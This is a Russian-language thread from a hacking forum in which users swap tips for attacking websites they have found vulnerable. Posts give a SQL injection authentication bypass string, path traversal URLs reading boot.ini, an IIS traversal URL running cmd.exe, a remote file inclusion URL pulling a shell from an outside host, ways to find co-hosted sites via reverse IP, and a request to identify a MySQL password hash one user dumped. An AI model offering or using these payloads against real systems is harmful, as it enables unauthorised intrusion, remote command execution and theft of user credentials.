ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Если в авторизации - попробуй что-нить из серии ' and 1=1/* '-- и т.п., т.е. закрываешь аргумент, дописываешь всегда верное условие или просто комментируешь остальной код. Ну это чтоб обойти авторизацию)

есть уязвимость на чтение файлов типа http://site.ru/?page=../../../../../../../../boot.ini. Гдето прочитал что таким способом можна заюзать cmd. Обьясните плз.

For example, a URL request which makes use of the scripts directory of IIS to traverse directories and execute a command can be:

http://server.com/scripts/..%5c../Windows/System32/
cmd.exe?/c+dir+c:\

The request would return to the user a list of all files in the C:\ directory by executing the cmd.exe command shell file and run the command "dir c:\" in the shell. The %5c expression that is in the URL request is a web server escape code which is used to represent normal characters. In this case %5c represents the character "\".

пробовал как написано не работает

Нашел сайт с sql инекцией. на сайте есть форум phpbb делаю запрос на вывод данных bla,bla+from+phpbb_users.. вообщем все как обычно но выводит данные другого phpbb. Ладно думаю я сервак один можно через другой форум тоже много чего на делать. но не могу найти сам адрес второго форума.. revers ip пока зывает еще неск сайтов но опять же нету там того форума... Как мне его найти уже пробовал в поисковиках icq,email полmзователей искать не помогло

4y4o, для начала надо убедица, что на удаленном серве стоит винда, а не никсы например. А потом подбирать путь до cmd.

m0use, попробуй inurl:tvoysite.com и смотри чего там проиндексировано. И ещё на archive.org посмотри старые версии сайта, мож там будут ссылки.

зайди вот сюда
http://madnet.name/tools/madss/
введи свой сайт и получиш список сайтов этого же сервака
Ну а там все понятно
и тем более -откуда ты уверен что сам форум под эту базу еще жив
может база от старого или еще че нить

n0ne там стоит винда и пусть к смд я подобрал. вопрос как эксплуатировать смд через вэб интерфейс. Windows/System32/cmd.exe?/c+dir+c:\ не работает. Я спросил есть ли ещё варианты читай внимательней.

Чтение еще не значит исполнение. Возможно, там только инклуд. Попробуй заюзать что-то типа
http://site.ru/?page=http://h4x0r.net/shell.php

Какая версия бд?

__________________
..

Что за тип хэша *02A4DF6067015EA7070ACE86D62DE48C0BCADA75?
Слил с mysql 4.1.22.